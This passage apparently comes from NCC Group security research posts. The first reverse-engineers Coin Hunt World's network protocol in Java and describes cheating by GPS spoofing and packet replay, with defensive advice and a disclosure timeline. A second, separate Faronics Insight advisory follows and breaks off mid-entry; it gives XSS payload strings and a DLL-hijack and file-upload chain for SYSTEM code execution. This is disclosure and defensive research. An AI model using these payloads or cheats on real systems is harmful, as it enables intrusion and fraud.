        this.pendingPacket.getHeader().setExpectedLen(dataSize);
        this.pendingPacket.setBuffer(new ByteArray());
        this.fsm.applyTransition(3);    // Moves from state 2 to 3
        if (data.getLength() > remaining) {
            data2 = resizeByteArray(data, remaining, data.getLength() - remaining);
        } else {
            data2 = this.EMPTY_BUFFER;
        }
    } else {
        // Append data to pendingPacket buffer
        writeBytes(this.pendingPacket, data);
        data2 = this.EMPTY_BUFFER;
    }
    return data2;
}

As more packets are received, this function will append those bytes to the buffer of the pendingPacket. This is done until a packet is received with a length greater than or equal to the remaining bytes. After, transition 3 will be applied, which will cause the code to jump to handlePacketData(). At this point, all of the data has been received and it can now be deserialized into an object.

Decoding the Messages

At this point, the payload header has been parsed which gives details about the length and format of the data to be received. Using that information the entire payload can be placed into a buffer decompressed/decrypted so that it can be converted into an object that can be used by the application. The starting point for this is handlePacketData().

private ByteArray handlePacketData(ByteArray data) throws SFSException {
    ByteArray data2;
    int remaining = this.pendingPacket.getHeader().getExpectedLen() - this.pendingPacket.getBuffer().getLength();
    boolean isThereMore = data.getLength() > remaining;
    ByteArray currentData = new ByteArray(data.getBytes());
    try {
        if (this.isDebugMode) {
            this.log.info("Handling Data: " + data.getLength() + ", previous state: " + this.pendingPacket.getBuffer().getLength() + "/" + this.pendingPacket.getHeader().getExpectedLen());
        }
        if (data.getLength() >= remaining) {
            writeBytes(this.pendingPacket, data, remaining);
            if (this.isDebugMode) {
                this.log.info("<<< Packet Complete >>>");
            }
            if (this.pendingPacket.getHeader().isEncrypted()) {
                try {
                    byte[] decrypted = this.packetEncrypter.decrypt(this.pendingPacket.getBuffer().getBytes());
                    this.pendingPacket.getBuffer().setBuffer(decrypted);
                } catch (Exception e) {
                    throw new SFSException(e);
                }
            }
            if (this.pendingPacket.getHeader().isCompressed()) {
                uncompress(this.pendingPacket);
            }
            this.protocolCodec.onPacketRead(this.pendingPacket.getBuffer());
            this.fsm.applyTransition(4);
        } else {
            writeBytes(this.pendingPacket, data);
        }
        if (isThereMore) {
            data2 = resizeByteArray(data, remaining, data.getLength() - remaining);
        } else {
            data2 = this.EMPTY_BUFFER;
        }
        return data2;
    } catch (RuntimeException ex) {
        this.log.error("Error handling data: " + ex.getMessage(), (Throwable) ex);
        this.skipBytes = remaining;
        this.fsm.applyTransition(5);
        return currentData;
    }
}

This function will first decrypt the payload (Not used in this app), decompresses the payload if necessary and then it passes it into onPacketRead().

public void onPacketRead(ByteArray packet) throws SFSException {
    ISFSObject sfsObj = SFSObject.newFromBinaryData(packet.getBytes());
    dispatchRequest(sfsObj);
}

From here we can see the start of where the payload gets deserialized into an SFSObject through the call to newFromBinaryData(). An SFSObject is an object that contains other objects or types such as integers or strings. When deserializing a data stream, it will always begin with an SFSObject and may contain several more nested SFSObjects. There are few function calls but the next area that gets interesting is the function decodeSFSObject().

private ISFSObject decodeSFSObject(ByteBuffer buffer) {
    ISFSObject sfsObject = SFSObject.newInstance();
    byte headerBuffer = buffer.get();
    if (headerBuffer != SFSDataType.SFS_OBJECT.getTypeID()) {
        throw new IllegalStateException("Invalid SFSDataType. Expected: " + SFSDataType.SFS_OBJECT.getTypeID() + ", found: " + ((int) headerBuffer));
    }
    int size = buffer.getShort();
    if (size < 0) {
        throw new IllegalStateException("Can't decode SFSObject. Size is negative = " + size);
    }
    for (int i = 0; i < size; i++) {
        try {
            int i2 = buffer.getShort();
            if (i2 < 0 || i2 > 255) {
                throw new IllegalStateException("Invalid SFSObject key length. Found = " + i2);
            }
            byte[] keyData = new byte[i2];
            buffer.get(keyData, 0, keyData.length);
            String key = new String(keyData);
            SFSDataWrapper decodedObject = decodeObject(buffer);
            if (decodedObject != null) {
                sfsObject.put(key, decodedObject);
            } else {
                throw new IllegalStateException("Could not decode value for key: " + keyData);
            }
        } catch (SFSCodecException codecError) {
            throw new IllegalArgumentException(codecError.getMessage());
        }
    }
    return sfsObject;
}

The first byte is for the headerBuffer, which is checked to ensure that it is of type SFSObject. So only payloads starting with an SFSObject are accepted. A size is read from the next 2 bytes (short) and then used in a for loop. On each iteration another size is read from the buffer, which is used to read a key. The value for this key is decoded from the buffer from the call to decodeObject(). So this essentially goes through each key in the data stream and decodes the data that follows it. At this point we are back at the function we initially started to reverse engineer from.

private SFSDataWrapper decodeObject(ByteBuffer buffer) throws SFSCodecException {
    SFSDataWrapper decodedObject;
    byte headerByte = buffer.get();
    if (headerByte == SFSDataType.NULL.getTypeID()) {
        decodedObject = binDecode_NULL(buffer);
    } else if (headerByte == SFSDataType.BOOL.getTypeID()) {
        decodedObject = binDecode_BOOL(buffer);
    } else if (headerByte == SFSDataType.BOOL_ARRAY.getTypeID()) {
        decodedObject = binDecode_BOOL_ARRAY(buffer);
    } else if (headerByte == SFSDataType.BYTE.getTypeID()) {
        decodedObject = binDecode_BYTE(buffer);
    } else if (headerByte == SFSDataType.BYTE_ARRAY.getTypeID()) {
        decodedObject = binDecode_BYTE_ARRAY(buffer);
    } else if (headerByte == SFSDataType.SHORT.getTypeID()) {
        decodedObject = binDecode_SHORT(buffer);
    } else if (headerByte == SFSDataType.SHORT_ARRAY.getTypeID()) {
        decodedObject = binDecode_SHORT_ARRAY(buffer);
    } else if (headerByte == SFSDataType.INT.getTypeID()) {
        decodedObject = binDecode_INT(buffer);
    } else if (headerByte == SFSDataType.INT_ARRAY.getTypeID()) {
        decodedObject = binDecode_INT_ARRAY(buffer);
    } else if (headerByte == SFSDataType.LONG.getTypeID()) {
        decodedObject = binDecode_LONG(buffer);
    } else if (headerByte == SFSDataType.LONG_ARRAY.getTypeID()) {
        decodedObject = binDecode_LONG_ARRAY(buffer);
    } else if (headerByte == SFSDataType.FLOAT.getTypeID()) {
        decodedObject = binDecode_FLOAT(buffer);
    } else if (headerByte == SFSDataType.FLOAT_ARRAY.getTypeID()) {
        decodedObject = binDecode_FLOAT_ARRAY(buffer);
    } else if (headerByte == SFSDataType.DOUBLE.getTypeID()) {
        decodedObject = binDecode_DOUBLE(buffer);
    } else if (headerByte == SFSDataType.DOUBLE_ARRAY.getTypeID()) {
        decodedObject = binDecode_DOUBLE_ARRAY(buffer);
    } else if (headerByte == SFSDataType.UTF_STRING.getTypeID()) {
        decodedObject = binDecode_UTF_STRING(buffer);
    } else if (headerByte == SFSDataType.TEXT.getTypeID()) {
        decodedObject = binDecode_TEXT(buffer);
    } else if (headerByte == SFSDataType.UTF_STRING_ARRAY.getTypeID()) {
        decodedObject = binDecode_UTF_STRING_ARRAY(buffer);
    } else if (headerByte == SFSDataType.SFS_ARRAY.getTypeID()) {
        buffer.position(buffer.position() - 1);
        decodedObject = new SFSDataWrapper(SFSDataType.SFS_ARRAY, decodeSFSArray(buffer));
    } else if (headerByte == SFSDataType.SFS_OBJECT.getTypeID()) {
        buffer.position(buffer.position() - 1);
        ISFSObject sfsObj = decodeSFSObject(buffer);
        SFSDataType type = SFSDataType.SFS_OBJECT;
        ISFSObject iSFSObject = sfsObj;
        if (sfsObj.containsKey(CLASS_MARKER_KEY)    sfsObj.containsKey(CLASS_FIELDS_KEY)) {
            type = SFSDataType.CLASS;
            iSFSObject = sfs2pojo(sfsObj);
        }
        decodedObject = new SFSDataWrapper(type, iSFSObject);
    } else {
        throw new SFSCodecException("Unknow SFSDataType ID: " + ((int) headerByte));
    }
    return decodedObject;
}

This is another important function and coordinates a lot of the deserializing. There is a huge if-else clause which essentially acts as a switch statement. A header byte is obtained from the buffer which is used in this switch statement to determine how to deserialize the next data element. The function getTypeID() returns an integer that corresponds with the given type. This seems to be used to decode all the primitive types (int, String, double, etc.) but also an SFSObject and SFSArray (an array that can contain different types of data) type. Most of the specific decoding functions are in the form binDecode_TYPE(buffer). Each type then corresponds to a value between 0 and 20 and the following values are defined in the SFSDataType enum.

NULL(0),
BOOL(1),
BYTE(2),
SHORT(3),
INT(4),
LONG(5),
FLOAT(6),
DOUBLE(7),
UTF_STRING(8),
BOOL_ARRAY(9),
BYTE_ARRAY(10),
SHORT_ARRAY(11),
INT_ARRAY(12),
LONG_ARRAY(13),
FLOAT_ARRAY(14),
DOUBLE_ARRAY(15),
UTF_STRING_ARRAY(16),
SFS_ARRAY(17),
SFS_OBJECT(18),
CLASS(19),
TEXT(20);

So if the headerByte is equal to 4, then the code in decodeObject() will call binDecode_INT() to decode an integer.

private SFSDataWrapper binDecode_INT(ByteBuffer buffer) {
    int intValue = buffer.getInt();
    return new SFSDataWrapper(SFSDataType.INT, Integer.valueOf(intValue));
}

This is a very simple function that just reads an integer (4 bytes) from the buffer and wraps it in the SFSDataWrapper to be returned. This returns back to the decodeSFSObject() function where it is set as the value for the key that was previously read.

sfsObject.put(key, decodedObject);

So an integer with the value of 147 would look like the following in the TCP packet.

04 00 00 00 93 – x04 is the integer type ID and x93 is 147 in hexadecimal

This call chain is recursive for SFSObjects which allows for nesting SFSObjects within each other. Similarly, SFSArrays make calls to decodeObject() allowing for nesting. With these details in mind, we now have all the necessary info for converting the binary payload sent over TCP back into an object used in the game.

Example Object Decoding

To summarize what we have learned so far, lets manually walk through decoding a message. The following is the hexadecimal representation of a message:

8000421200030001701200020001701200010007737563636573730101000163080017757365722E75706461746555736572416374697669747900016103000D0001630201

This message can be broken down like the following:

First up is the header byte which is 0x80. So we are just dealing with binary data with no compression or encryption used. We also know from the header that the next thing to do is read a short from the buffer, 0x0042, which represents the size of the payload. At this point is when the buffer is passed into decodeSFSObject(). The first step was grabbing the object header byte, 0x12 and making sure that it represents the SFSObject data type, which it does. Then for each of the 3 elements in the SFSObject, a key is read then the buffer is passed into decodeObject to read the object (i.e. SFSObject, int, byte, etc.). For the SFSObjects in the data stream, decodeSFSObject() will be called recursively to parse nested SFSObjects. The final result is an object that looks like this:

(sfs_object) p: 
  (sfs_object) p: 
    (bool) success: true
  (utf_string) c: user.updateUserActivity
(short) a: 13
(byte) c: 1

Hooking Functions to Decode Traffic

Now that we understand how the protocol works, lets look at how we can utilize the
JAR file to facilitate decoding the traffic. To do this we will import the JAR into a Java project and make calls to the necessary functions that we reversed earlier. The first step is reading in a pcap file and iterating over each TCP message on port 9933 and extracting the data section of the packet.

// Processing of packets was done using org.pcap4j
handle = Pcaps.openOffline(filename); //open pcap file
String filter = "tcp port 9933";    // filter for TCP port 9933
handle.setFilter(filter, BpfCompileMode.OPTIMIZE);

// Loop through each packet and grab the TCP data section
Packet packet = null;
while(true) {
    packet = handle.getNextPacketEx();
    if (p == null) {
        break;
    }
    TcpPacket tcpPacket = packet.get(TcpPacket.class);


    if (tcpPacket.getPayload() != null) {
      byte[] data = tcpPacket.getPayload().getRawData();
    }
}

Previously, we saw that the SFSIOHandler was the starting point for processing packets. So we need to instantiate the class. The constructor takes a BitSwarmClient object as its only argument.

public SFSIOHandler(BitSwarmClient bitSwarm) {
    this.isDebugMode = false;
    this.bitSwarm = bitSwarm;
    this.protocolCodec = new SFSProtocolCodec(this, bitSwarm);
    this.packetEncrypter = new DefaultPacketEncrypter(bitSwarm);
    InitStates();
    this.isDebugMode = bitSwarm.getSfs().isDebug();
}

Initially, we tried to instantiate the BitSwarmClient with its empty constructor and pass that object into the SFSIOHandler‘s constructor but this gave an error. So we looked into how SFSIOHandler was being instantiated.

this.bitSwarm = new BitSwarmClient(this);
this.bitSwarm.setIoHandler(new SFSIOHandler(this.bitSwarm));
this.bitSwarm.init();

This is ran within the initialize() function of the SmartFox class. this is a Java keyword used to reference the current object, so in this case, the SmartFox object. So we should be able to get a reference to a correctly initialized BitSwarmClient by instantiating the SmartFox class first, then using that to grab a reference to the BitSwarmClient. First we need to check to see if the SmartFox constructor takes any non primitive data types that may cause further issues for us.

public SmartFox(boolean debug) {
    this.CLIENT_TYPE_SEPARATOR = ':';
    this.majVersion = 1;
    this.minVersion = 7;
    this.subVersion = 8;
    this.clientDetails = "Android";
    this.useBlueBox = true;
    this.isJoining = false;
    this.inited = false;
    this.debug = false;
    this.isConnecting = false;
    this.autoConnectOnConfig = false;
    this.bbConnectionAttempt = 0;
    this.nodeId = null;
    this.log = LoggerFactory.getLogger(getClass());
    this.debug = debug;
    initialize();
}

Great! This only takes a boolean value. This value looks to be used for debugging, so may even be helpful to set as true as we develop the code to get insight into any issues we run into. We also see that at the end of the constructor, the initialize() function is called which will initialize the BitSwarmClient. So after instantiating the SmartFox class, we can utilize the getSocketEngine() function from the SmartFox class to obtain a reference to the BitSwarmClient object.

public BitSwarmClient getSocketEngine() {
    return this.bitSwarm;
}

So now we have a reference to the BitSwamClient object. Now to get a SFSIOHandler object we could initialize a new instance but from earlier we saw that the BitSwarmClient sets the SFSIOHandler (this.bitSwarm.setIoHandler(new SFSIOHandler(this.bitSwarm));)). So we can actually just use the following function from the BitSwarmClient to obtain a reference to a correctly initialize SFSIOHandler object.

public IOHandler getIoHandler() {
    return this.ioHandler;
}

Putting this all together we can get a reference to an SFSIOHandler object which we can then utilize for decoding.

SmartFox sf = new SmartFox(true);
SFSIOHandler handler = (SFSIOHandler) sf.getSocketEngine().getIoHandler();

With the handler set up, we can start working on parsing the data from the TCP packets.
From reversing earlier, we discovered that the entry point for handling the data from the TCP packets was the onDataRead() function of the SFSIOHandler class. So we can now call that directly using our handler.

handler.onDataRead(data);

From earlier, recall that the handler used a Finite State Machine for handling each step in the parsing process. This is relevant when instrumenting this functionality since the game messages may span 2 or more TCP packets. So we need to be able to know when an entire message has been parsed so that we can extract the SFSObject to print its contents in a more human readable form. To begin, we need to obtain a reference to the FinitStateMachine (fsm) variable from the SFSIOHandler class. Unfortunately, the fsm variable is private and the SFSIOHandler class does not have any getters for accessing this variable. Luckily, Java has some convenient functionality where you can take private variables and make them accessible. This can be done with the following code.

Field field=SFSIOHandler.class.getDeclaredField("fsm");
field.setAccessible(true);
FiniteStateMachine fsm = (FiniteStateMachine)field.get(handler);

Now that we have a reference to the FiniteStateMachine, we can check the state after each packet has been processed to see if the entire message has been received. The FiniteStateMachine exposes the getCurrentState() function to do this. Recall from the finite state machine diagram from earlier that the once the data has been deserialized into a SFSObject the state is set back to 0. So we can use this to signal when all of the data has been received for a given message.

if (fsm.getCurrentState() == 0)

Lastly, we need to get the SFSObject. Unfortunately, we could not extract it directly from the handler, but we can get the buffer of the pending packet and use that to deserialize the SFSObject. This buffer is a private variable so the same technique used for the FiniteStateMachine was needed to access it.

// Make the private variable pendingPacket accessible
Field field=SFSIOHandler.class.getDeclaredField("pendingPacket");
field.setAccessible(true);
PendingPacket pendingPacket = (PendingPacket)field.get(handler);

// Grab the buffer and convert it into an SFSObject
ISFSObject sfsObj = SFSObject.newFromBinaryData(pendingPacket.getBuffer().getBytes());

Now we can make use of the SFSObjects function getDump() to print out a readable version of the SFSObject. Putting all of these pieces together (forgoing error catching for simplicity) looks like the following.

public static void decodePcap(String filename) {
    // Set up handler for handling TCP packet data
    SmartFox sf = new SmartFox(false);
    SFSIOHandler handler = (SFSIOHandler) sf.getSocketEngine().getIoHandler();

    // Open Pcap file
    final PcapHandle pcapFile = Pcaps.openOffline(filename);

    // Filter for TCP packets on port 9933
    String filter = "tcp port 9933";
    pcapFile.setFilter(filter, BpfCompileMode.OPTIMIZE);


    Packet packet = null;
    while(true) {
            packet = pcapFile.getNextPacketEx();
        if (packet == null) {
            break;
        }
        TcpPacket tcpPacket = packet.get(TcpPacket.class);

        if (tcpPacket.getPayload() != null) {
            byte[] buffer = tcpPacket.getPayload().getRawData();
            ByteArray data = new ByteArray(buffer);

            // Read packet data 
            handler.onDataRead(data);

            // Make the private pendingPacket variable accessible
            Field ppField=SFSIOHandler.class.getDeclaredField("pendingPacket");
            ppField.setAccessible(true);
            PendingPacket pendingPacket = (PendingPacket)ppField.get(handler);

            // Make the private fsm variable accessible
            Field fsmField=SFSIOHandler.class.getDeclaredField("fsm");
            fsmField.setAccessible(true);
            FiniteStateMachine fsm = (FiniteStateMachine)fsmField.get(handler);

            // Check that the state of the finite state machine is 0
            if (fsm.getCurrentState() == 0) {

                // Grab the bytes from the complete payload and deserialize it into an SFSObject
                ISFSObject sfsObj = SFSObject.newFromBinaryData(pendingPacket.getBuffer().getBytes());
                logger.info(sfsObj.getDump());
            }

        }
    }
}

Now lets test it out and see what the output looks like.

With this program we can start analyzing the game traffic and begin thinking of ways to attack it.

Cheating

Putting all of that together, we created a tool which can be used to decode pcap files or used as a proxy to analyze and replay requests. Using the tool we analyzed the network traffic to better understand how the application worked. From that analysis it was discovered that the server sets the state of most of the interesting things to attack. So when going through the vault unlocking process, the server will send to the client how much cryptocurrency the user has acquired. Since there did not seem to be anyway to set this from the client, that attack did not seem possible. There are a couple of things that the server cannot set for the client. These are the GPS coordinates and the walking pattern used for acquiring more keys.

Spoofing the GPS coordinates is easy to do and allows you to open vaults without being physically close to them. This can done fairly easily on Android by enabling Developer mode and choosing a mock location app.

From within the mock location app, set your location to near a vault. Then when you start up Coin Hunt World, you will be right next to the vault. All of the vault locations nearby can be captured from a request from the server. A single entry of what this looks like is below.

(sfs_object) 
    (double) lng: -79.57888
    (long) tier: 1
    (bool) action: true
    (long) id: 317744
    (int) state: 0
    (utf_string) type: reg_v
    (null) custom_data: null
    (double) lat: 43.581177
    (long) key: 1

This can be used with the GPS spoofing app to easily navigate to available vaults.

Spoofing walking is a bit more complicated. While walking, the application will make requests like the following.

(sfs_object) p: 
  (sfs_object) p: 
    (int) running: 10
        (long) start_time: 1659970831567
        (double) lng: -79.5733108520508
        (int) stationary: 10
        (int) walking: 10
        (int) in_vehicle: 10
        (int) cycling: 10
        (int) steps: 8
        (double) lat: 43.5827903747559
        (int) unknown: 10


  (int) r: -1
  (utf_string) c: user.updateUserActivity


(short) a: 13
(byte) c: 1

This request is used to tell the server that the user has been walking and give data associated with that. The client will also periodically make the following request to check in on how close they are to completing the next milestone.

(sfs_object) p: 
  (sfs_object) p: 


  (int) r: -1
  (utf_string) c: user.validateUserSteps


(short) a: 13
(byte) c: 1

and the server will respond with something like this.

(sfs_object) p: 
  (sfs_object) p: 
    (int) prev_milestone: 0
        (bool) milestone_reached: false
        (bool) success: true
        (int) steps: 79
        (int) next_milestone: 500


  (utf_string) c: user.validateUserSteps


(short) a: 13
(byte) c: 1

This is mostly used to update the UI so that the user knows how far until they reach the next milestone. From observing this behavior, we noticed that the user.updateUserActivity command would increase the number of steps taken by the value for the steps parameter in that command. So with this information we began doing some tests to try and increase our step count. Initially, we attempted to replay a single request, but unfortunately the step count stayed the same. So they are doing some validation on the parameters sent to try and prevent cheating. Next the GPS coordinates were modified slightly but still the result was the same. The last single replay test was done by including updated timestamps in the replay but this did not work either.

With no success from replaying individual requests, it was time to attempt replaying a sequence of captured packets to try and achieve the walking milestones. This was meant to mimic walking as to bypass the validation that is done on the server to see if a user is actually walking. To get the requests to repeat, we first walked around and captured the sequence of packets to be used. After, we modified the code for the proxy slightly so that we could replay those requests with a push of a button. For each request, the timestamp was modified to the current time and a delay was set for the difference in time between each packet to mimic how the requests were originally sent out. Finally, we were able to complete a walking milestone without walking!

So now we can play the game without moving physically. We can obtain new keys by replaying previous captures of walking and can open vaults by spoofing our GPS coordinates to the positions that the vaults are located.

Defensive Guidance

The methods for cheating discussed in this post are interesting since it is not possible to completely stop them. GPS coordinates are controlled by the user’s device so spoofing them is always a possibility. The best measures to protect against this type of attack is through anti-reversing protections and cheat detection.

Encryption should be used for all network communication. Not only does this make intercepting and modifying traffic easier, it also leaves the user’s data open to an attacker passively listening on the network. The application can also perform checks on the device to see if it is running in a safer environment. Some of these checks could be to see if the device is rooted, emulated or currently spoofing the location. If any of these checks are true, return a message to the user and do not execute the application. It may also be worth recording a unique device identifier to identify users that working toward bypassing these checks.

To detect spoofed locations, some heuristics can be employed. Calculating the distance a user has traveled in a given period of time can be used to determine if a user is moving around the world faster than possible. The variation of the GPS coordinates could also be used. The exact location should vary slightly due to the nature of the GPS technology. If a user is consistently reporting the same GPS coordinates, it could indicate that they are replaying previous requests. On top of the previous heuristics, machine learning models can be trained and used to identify anomalies in location data. These models should be trained on known good data. All of these should be targeting long term patterns for a user and not single suspicious instances. This should help distinguish between active cheaters and errors in reporting due to equipment.

Conclusion

Throughout this post we went through the process of reverse engineering the game Coin Hunt World and most importantly how the game tracks state. To do this, we identified all network communication then reverse engineered and developed tooling to properly decode a third party binary protocol. We then looked into methods of cheating by spoofing GPS coordinates and replaying packets to complete the walking milestones. Researching games in the play-to-earn space can be interesting, because cheating can turn virtual assets directly into real money. More work can be done looking into other play-to-earn games to identify weaknesses in their earning model. NCC Group regularly provides security testing against games and gaming ecosystems to help developers find flaws in their systems and patch them.

Disclosure Timeline

1. February 14th, 2023 – Initial disclosure of the unencrypted communication and location spoofing.
2. February 14th, 2023 – Responded that they will look into and fix the unencrypted communication and that there is a team that monitors movement and removes cheaters every day. These algorithms are constantly being refined.
3. May 11th, 2023 – Received confirmation that the unencrypted communication was fixed as of the end of April.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Introduction

Faronics Insight is a feature rich software platform which is deployed on premises in schools. The application enables teachers to administer, control and interact with student devices. The application contains numerous features, including allowing teachers to transfer files to/from students and remotely viewing the contents of student screens.

Generally speaking, the architecture of the application is a classic client/server model – the “server” is the Teacher Console and each “client” is a Student Console deployed on every student machine in a classroom.

A number of flaws were identified in the Faronics Insight software product, with consequences ranging from person-in-the-middle attacks on data transmitted between Student Consoles and Teacher Consoles to Remote Code Execution (RCE) as SYSTEM on any active Student or Teacher console.

Overall, 11 vulnerabilities were identified, with links to their technical advisories below:

1. Numerous DLL Hijacking Vulnerabilities in Teacher and Student Consoles
2. Systemic Stored and Reflected Cross Site Scripting Flaws (CVE-2023-28350)
3. RCE As SYSTEM Via Unauthenticated File Upload API (CVE-2023-28353)
4. RCE as SYSTEM via Artificial Student Console and XSS (CVE-2023-28347)
5. RCE as SYSTEM via Artificial Teacher Console (CVE-2023-28349)
6. All Data Transmitted in Plaintext Enabling MITM (CVE-2023-28348)
7. Enhanced Security Mode May Be Bypassed (CVE-2023-28352)
8. Virtual Host Routing Can Be Defeated (CVE-2023-28346)
9. Keystroke Logs Are Stored in Plaintext in a World Readable Directory (CVE-2023-28351)
10. Lack of Access Controls on Student APIs (CVE-2023-28344)
11. Teacher Console Credentials Exposed via API Endpoint (CVE-2023-28345)

Vulnerability research was performed against Faronics Insight v11.21.2100.262 available on https://faronics.com.

As of Insight v11.23.x.289, these vulnerabilities have been fixed. Faronics’ release notes can be found here.

1. Numerous DLL Hijacking Vulnerabilities in Teacher and Student Consoles

Risk: High (8.2 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H.)

Summary

The Teacher Console Server and Student Console Agents both attempt to load a variety of system DLLs in an unsafe manner.

Impact

Because the Teacher Console Server and Student Console Agent processes both execute as the SYSTEM user, total system compromise can be achieved when a malicious DLL is loaded inadvertently.

Details

Windows applications make use of Dynamically Linked Libraries (DLL) files to add or reference additional functionality exposed by those DLLs. DLL files are typically loaded when applications first start up, and the application typically knows precisely where the DLL files are located in order to load them as quickly as possible.

In cases where the DLL file’s path is not hardcoded (“sas.dll” as opposed to “C:\Windows\System32\sas.dll” for example), Windows will look for the file in a specific order –

• The directory the application is being loaded from
• The C:\Windows\system32 directory
• The C:\Windows directory
• The directories located in the PATH environment variable.

This is generally sufficient, because developer-supplied DLLs should be loaded from the same directory that the application runs from.

During this vulnerability research, it was observed that both the student and teacher agent/servers respectively attempt to load Microsoft DLLs from the application’s installation directory, as this screenshot from ProcMon demonstrates –

The screenshot above shows three instances where FITeacherSVC.exe (which runs as SYSTEM) attempts to load a system DLL from the current working directory rather than the intended directory.

Combined with the other vulnerabilities identified in this application during this vulnerability research, it was possible to place a malicious “sas.dll” into the “C:\Program Files\Faronics\Insight Teacher” (and Insight Student) directory, granting code execution on the next Faronics Insight restart.

Overall the following system DLLs are being loaded unsafely in the student and teacher consoles –

• WTSAPI32.dll
• sas.dll
• USERENV.dll
• WINSTA.dll
• Profapi.dll
• Dbghelp.dll
• IPHLPAPI.dll
• WINMM.dll
• CRYPTBASE.DLL
• Powrprof.dll
• UMPDC.dll
• Sspicli.dll
• Node.dll

Recommendation

System DLLs, which are guaranteed to be present inside of Windows system directories (C:\Windows, C:\Windows\SYSTEM32) should have their include paths hardcoded. Instead of linking to, for example, “sas.dll” in the build environment it is safer to link to “C:\Windows\System32\sas.dll” directly.

2. Systemic Stored and Reflected Cross Site Scripting Flaws (CVE-2023-28350)

Risk: High (8.7 CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:H)

Summary

Attacker supplied input is not validated/sanitized prior to being rendered in both the Teacher and Student Console applications, enabling the attacker to execute JavaScript in these applications.

Impact

Due to the rich and highly privileged functionality offered by the Teacher Console, the ability to silently exploit Cross Site Scripting (XSS) on the Teacher’s machine enables RCE on any connected student machine (and the teacher’s machine).

Details

Cross Site Scripting (XSS) is a vulnerability category commonly found in web applications. The vulnerability occurs when applications accept user supplied input and then render it directly on a webpage without first sanitizing it / ensuring that it is safe. When unsanitized user input is rendered in a web application it can frequently be used to execute JavaScript in a victim’s browser.

Both the Teacher and Student Insight UI applications are “Electron” applications, meaning that they are effectively rich JavaScript-based web applications embedded inside of an executable file. Because Electron apps are essentially web applications, they are especially vulnerable to XSS vulnerabilities and significant attention must be paid to input validation.

During this vulnerability research, NCC Group researchers observed that there is almost no input validation present across either of the Insight UI applications, allowing for trivial compromise via XSS.

Some of the many identified XSS vectors are listed below –

• Keystroke logs
• Student device login names
• Student desktop names
• Class ID
• Quiz names
• Chat messages*

It is worth noting that some of the above XSS vectors are only exploitable by directly HTTP POSTing malicious data to the API, which is then rendered unsafely in the UI. In general, the barrier to storing malicious payloads in the UI is because of field length restrictions, rather than any input validation in the UI.

“Chat messages” above is marked with an asterisk because chat messages are generally sanitized, however it was observed that messages containing “<b> </b>”, “<a> </a>” and “<i> </i>” are not sanitized (presumably to enable formatted messages between teacher and student.) and are therefore exploitable by sending malicious messages such as “<b> </b><script>alert(“NCC Group XSS”);</script>”. A slightly more sophisticated example of this in action can be seen below –

As noted above in the impact statement, the lack of input sanitization in the Faronics Insight product is especially dangerous because the product exposes numerous JavaScript functions which can be used to transfer files to / from various machines, start / stop executables on student machines, uninstall the insight product, software-lock workstations etc.

Recommendation

When rendering user submitted data in either the Student or Teacher console, encode the output based on the appropriate context of where the output is included. Content placed into HTML needs to be HTML-encoded, for example. To work in all situations, HTML encoding functions should encode the following characters: single and double quotes, backticks, angle brackets, forward and backslashes, equals signs, and ampersands.

An additional line of defense is to perform validation on both the presentation tier, in the client-side JavaScript, and on the server-side, in the Express server. Validating input in both tiers of the application will help to ensure that users cannot simply circumvent client side controls by simply submitting malicious payloads to the server.

3. RCE As SYSTEM Via Unauthenticated File Upload API (CVE-2023-28353)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

An unauthenticated attacker is able to upload any type of file to any location on the Teacher Console’s computer, enabling a variety of different exploitation paths including code execution. It is also possible for the attacker to chain this vulnerability with other identified (and disclosed) vulnerabilities to cause a deployed DLL file to immediately execute as SYSTEM.

Impact

A remote unauthenticated attacker can gain code execution as SYSTEM on the teacher’s computer, this is the highest privilege level in Windows and constitutes a total system compromise.

Details

The Faronics Insight teacher application contains functionality which is able to force student devices to upload files from a given folder on their machine. This functionality operates as follows –

• Teacher Console sends an “uploadstudentfile” WebSocket message to a given Student Console
  • This message contains the source path, source file name and destination on the Teacher Console to save the file to.
• Student Console sends the file over an unauthenticated HTTP POST multipart request, complete with the downloaded file, file name and destination path
• The ‘FITeacherServer.exe’ process (which runs as SYSTEM) writes the file to the destination path, anywhere on disk.

It was observed as part of this vulnerability research that a network connected attacker with knowledge of a student’s agent ID, which is trivial to obtain by abusing Faronics UDP broadcast discovery mechanism, is able to send arbitrary files to this API endpoint and deploy them anywhere on the teacher’s disk.

At this point there are clearly numerous different ways that this could be abused to obtain privileged code execution, ranging from deploying the file to an administrator’s “Startup” directory to overwriting any number of files under C:\Windows\System32 to achieve persistence as SYSTEM.

NCC Group researchers instead chose to chain three vulnerabilities in Faronics Insight together to achieve a more immediate RCE as SYSTEM –

1. Upload a malicious copy of “sas.dll” to “C:\Program Files\Faronics\Insight Student” using the API
2. Leverage the “Fake Student Console” zero click XSS vulnerability to call “<script>relaunchInsight();</script>”, restarting the Teacher Console process
3. Leverage the DLL hijacking vulnerability such that when Insight relaunches, it attempts to load the malicious “sas.dll” DLL file and executes the malicious code within as SYSTEM.

The following screenshot demonstrates the result of this exploit chain, that a new administrator named OLIVER_BROOKS_NCC2 was created –

Recommendation

NCC Group recommends that additional access controls are implemented which restrict an unauthorized/unauthenticated attacker from submitting files to the API. These access controls could be implemented by requiring valid Student Consoles to submit a valid session ID cookie with every HTTP request.

NCC Group recommends that the Teacher Console is updated to restrict file uploads to a particular directory, this will help to ensure that in the event of a Student Console compromise, an attacker is unable to persist files in arbitrary locations on the Teacher’s file system.

Finally, NCC Group recommends that some consideration is given to the principal of least privilege. If the “FITeacherServer.exe” could successfully function when executed by a lower privileged user then it would be safer to do so, this would greatly lower the severity of any code execution vulnerabilities which emerge in the future.

4. RCE as SYSTEM via Artificial Student Console and XSS (CVE-2023-28347)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

It is possible for an attacker to create a proof of concept script which functions similarly to a Student Console, providing unauthenticated attackers with the ability to exploit XSS vulnerabilities within the Teacher Console application and gain RCE in a ‘Zero Click’ manner.

Impact

